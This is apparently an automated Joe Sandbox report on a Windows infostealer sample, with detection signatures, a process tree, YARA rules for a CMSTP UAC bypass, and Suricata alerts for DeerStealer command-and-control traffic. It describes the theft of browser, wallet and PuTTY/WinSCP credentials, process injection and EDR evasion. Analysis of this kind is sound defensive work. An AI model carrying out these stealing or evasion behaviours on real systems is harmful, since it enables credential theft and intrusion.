Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TVr2Z822J3.exe

Overview

General Information

Sample name:TVr2Z822J3.exe
renamed because original name is a hash value
Original sample name:abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5.exe
Analysis ID:1556011
MD5:467e95c9a46987552925c47bc7b38916
SHA1:3732116b8ef5ee6094ea49a0658dcb7a7adb2634
SHA256:abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5
Tags:exesirnisirlo-onlineuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TVr2Z822J3.exe (PID: 396 cmdline: "C:\Users\user\Desktop\TVr2Z822J3.exe" MD5: 467E95C9A46987552925C47BC7B38916)
    • ActiveISO.exe (PID: 5876 cmdline: "C:\Users\user\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)
      • ActiveISO.exe (PID: 1792 cmdline: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe MD5: B84DFABE933D1160F624693D94779CE5)
        • cmd.exe (PID: 3232 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • UploadAlt_Ti.exe (PID: 2176 cmdline: C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • ActiveISO.exe (PID: 3988 cmdline: "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)
    • cmd.exe (PID: 2020 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ActiveISO.exe (PID: 744 cmdline: "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe" MD5: B84DFABE933D1160F624693D94779CE5)
    • cmd.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • UploadAlt_Ti.exe (PID: 4836 cmdline: C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000019.00000002.2171548807.0000000005052000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      0000001B.00000002.2306254351.00000000026AF000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000010.00000002.1820736512.0000023BF5A88000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000011.00000002.1889758659.0000000002DB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            17.2.cmd.exe.2d84a78.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              17.2.cmd.exe.2d84a78.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x3c0f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x3c0c0:$s2: Elevation:Administrator!new:
              27.2.UploadAlt_Ti.exe.26b5a20.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                27.2.UploadAlt_Ti.exe.26b5a20.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x2a435f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x2a43ea:$s1: CoGetObject
                • 0x2a4343:$s2: Elevation:Administrator!new:
                27.2.UploadAlt_Ti.exe.26faaed.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 29 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3232, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe, ProcessId: 2176, ProcessName: UploadAlt_Ti.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-14T19:56:53.472277+010020283713Unknown Traffic192.168.2.749180188.114.97.3443TCP
                  2024-11-14T19:56:55.316793+010020283713Unknown Traffic192.168.2.749191188.114.97.3443TCP
                  2024-11-14T19:56:56.987750+010020283713Unknown Traffic192.168.2.749202188.114.97.3443TCP
                  2024-11-14T19:57:00.659841+010020283713Unknown Traffic192.168.2.749218188.114.97.3443TCP
                  2024-11-14T19:57:03.390674+010020283713Unknown Traffic192.168.2.749234188.114.97.3443TCP
                  2024-11-14T19:57:05.079525+010020283713Unknown Traffic192.168.2.749241188.114.97.3443TCP
                  2024-11-14T19:57:07.345394+010020283713Unknown Traffic192.168.2.749251188.114.97.3443TCP
                  2024-11-14T19:57:08.795187+010020283713Unknown Traffic192.168.2.749258188.114.97.3443TCP
                  2024-11-14T19:57:10.927041+010020283713Unknown Traffic192.168.2.749263188.114.97.3443TCP
                  2024-11-14T19:57:12.682251+010020283713Unknown Traffic192.168.2.749264188.114.97.3443TCP
                  2024-11-14T19:57:44.181061+010020283713Unknown Traffic192.168.2.749265188.114.97.3443TCP
                  2024-11-14T19:57:46.191474+010020283713Unknown Traffic192.168.2.749266188.114.97.3443TCP
                  2024-11-14T19:57:47.567376+010020283713Unknown Traffic192.168.2.749267188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-14T19:56:54.027538+010020565501A Network Trojan was detected192.168.2.749180188.114.97.3443TCP
                  2024-11-14T19:57:45.085102+010020565501A Network Trojan was detected192.168.2.749265188.114.97.3443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\josvehJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\itpyyyxJoe Sandbox ML: detected
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653766FA0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,8_2_00007FF653766FA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2016FA0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,10_2_00007FF6B2016FA0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CAF180 ??0QUrl@@QEAA@AEBV0@@Z,??0QString@@QEAA@XZ,?setPassword@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z,??1QString@@QEAA@XZ,??0QString@@QEAA@XZ,?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z,??1QString@@QEAA@XZ,??0QCryptographicHash@@QEAA@W4Algorithm@0@@Z,?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z,?addData@QCryptographicHash@@QEAAXAEBVQByteArray@@@Z,??1QByteArray@@QEAA@XZ,?result@QCryptographicHash@@QEBA?AVQByteArray@@XZ,?constData@QString@@QEBAPEBVQChar@@XZ,?number@QByteArray@@SA?AV1@_JH@Z,?left@QByteArray@@QEBA?AV1@H@Z,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,?size@QString@@QEBAHXZ,?at@QByteArray@@QEBADH@Z,?size@QString@@QEBAHXZ,?constData@QString@@QEBAPEBVQChar@@XZ,?constData@QString@@QEBAPEBVQChar@@XZ,?number@QString@@SA?AV1@IH@Z,??1QString@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QCryptographicHash@@QEAA@XZ,??1QUrl@@QEAA@XZ,10_2_00007FFB09CAF180
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09CF16A0 ??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?shared_null@QHashData@@2U1@B,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?system@QRandomGenerator64@@SAPEAV1@XZ,?_fillRange@QRandomGenerator@@AEAAXPEAX0@Z,?number@QByteArray@@SA?AV1@_KH@Z,?hash@QCryptographicHash@@SA?AVQByteArray@@AEBV2@W4Algorithm@1@@Z,?toHex@QByteArray@@QEBA?AV1@XZ,??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,10_2_00007FFB09CF16A0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_73b6a618-b

                  Exploits

                  barindex
                  Source: Yara matchFile source: 17.2.cmd.exe.2d84a78.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.UploadAlt_Ti.exe.26b5a20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.UploadAlt_Ti.exe.26faaed.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.cmd.exe.509e6cd.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.cmd.exe.4d6facd.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.cmd.exe.503da00.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.UploadAlt_Ti.exe.26a2aed.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.cmd.exe.2db07f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.cmd.exe.5058a00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.UploadAlt_Ti.exe.26fb6ed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.cmd.exe.4d2aa00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.UploadAlt_Ti.exe.26a36ed.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.cmd.exe.509dacd.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.cmd.exe.4d706cd.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.cmd.exe.5082acd.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.UploadAlt_Ti.exe.265da20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.cmd.exe.50836cd.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.2171548807.0000000005052000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.2306254351.00000000026AF000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1820736512.0000023BF5A88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1889758659.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1419280539.000002B7CE788000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.1962021815.00000285613F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1338281133.000001AD62686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1890287986.0000000004D24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3232, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UploadAlt_Ti.exe PID: 2176, type: MEMORYSTR
                  Source: TVr2Z822J3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49180 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49191 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49202 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49218 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49234 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49241 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49251 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49258 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49263 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49264 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49265 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49266 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49267 version: TLS 1.2
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb33 source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1363124751.00007FFB1D895000.00000002.00000001.01000000.0000000D.sdmp, ActiveISO.exe, 0000000A.00000002.1432759875.00007FFB1D545000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: ntdll.pdb source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Network.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: ActiveISO.exe, 00000008.00000003.1327940591.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360332952.00007FFB0BCC6000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 0000000A.00000002.1431665279.00007FFB0B9D6000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362864576.00007FFB1C261000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 0000000A.00000002.1432442405.00007FFB18B81000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1359749074.00007FFB0B5A1000.00000002.00000001.01000000.0000000A.sdmp, ActiveISO.exe, 0000000A.00000002.1430496192.00007FFB0A751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbF source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdbH source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,6_2_0040301A
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,6_2_00402B79
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7A370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,8_2_00007FFB0BC7A370
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.7:49180 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.7:49265 -> 188.114.97.3:443
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49180 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49202 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49218 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49191 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49234 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49241 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49266 -> 188.114.97.3:443
